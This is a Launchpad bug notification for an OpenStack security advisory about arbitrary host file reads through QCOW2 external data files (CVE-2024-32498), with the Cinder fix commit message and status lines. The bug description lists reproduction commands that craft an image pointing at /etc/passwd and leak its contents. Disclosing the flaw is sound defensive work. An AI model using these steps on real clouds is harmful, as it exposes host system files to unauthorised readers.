[Bug 2059809] Re: [OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

Fri Dec 6 10:54:29 UTC 2024

Reviewed:  https://review.opendev.org/c/openstack/cinder/+/925098
Committed: https://opendev.org/openstack/cinder/commit/9875e4bc1d6b21be24253a52b5e40deb24748744
Submitter: "Zuul (22348)"
Branch:    unmaintained/wallaby

commit 9875e4bc1d6b21be24253a52b5e40deb24748744
Author: Brian Rosmaita <rosmaita.fossdev at gmail.com>
Date:   Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance.  This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes.  It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files.  Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size avaialable without actually changing
    the size value in cinder.  While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    unmaintained/yoga only: The tests
    cinder.tests.unit.volume.drivers.test_quobyte.QuobyteDriverTestCase.
    * test_copy_volume_from_snapshot_not_cached_overlay
    * test_copy_volume_from_snapshot
    * test_copy_volume_from_snapshot_not_cached
    failed as convert_image mock was not called, remove this mock
    from yoga and on older branches.

    With older qemu installed one of the qemu-img
    create commands fails, let's skip it from unmaintained/yoga and
    below that in test_qcow2_safety_checks.

    Co-authored-by: Dan Smith <dansmith at redhat.com>
    Co-authored-by: Felix Huettner <felix.huettner at mail.schwarz>

    Conflicts:
      cinder/image/image_utils.py

    NOTE(elod.illes): conflict is due to mypy patch was added in xena only:
    Ib32e58125be3a2b6d05488807c83d48e920cf57d

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit 4aa6590a483901de64e0d162fff11f3d2d7f9977)
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)
    (cherry picked from commit 0c3c65376f1aa46b35bedb4b59eac0bf8cc5979e)
    (cherry picked from commit 312d98d74490414902f3379b91b63dfa65f9b622)

** Tags added: in-unmaintained-wallaby

-- 
You received this bug notification because you are a member of Ubuntu
OpenStack, which is subscribed to Ubuntu Cloud Archive.
https://bugs.launchpad.net/bugs/2059809

Title:
  [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
  (CVE-2024-32498)

Status in Cinder:
  Fix Released
Status in Ubuntu Cloud Archive:
  Fix Released
Status in Ubuntu Cloud Archive antelope series:
  Fix Released
Status in Ubuntu Cloud Archive bobcat series:
  Fix Released
Status in Ubuntu Cloud Archive caracal series:
  Fix Released
Status in Ubuntu Cloud Archive ussuri series:
  Fix Committed
Status in Ubuntu Cloud Archive yoga series:
  Fix Released
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  Fix Released
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
  QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

  Steps to Reproduce:

  - Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
  - Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
  - Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
  - Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

  With the non-bootable instance there might be two ways to continue:

  Option 1:
  - Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
  - Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
  - The file content starts at guest cluster 0

  Option 2: (this is untested because I reproduced it only in a production system)
  - Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
  - Go to the Dashboard, open the console of the instance and login to the instance.
  - Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
  - It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cinder/+bug/2059809/+subscriptions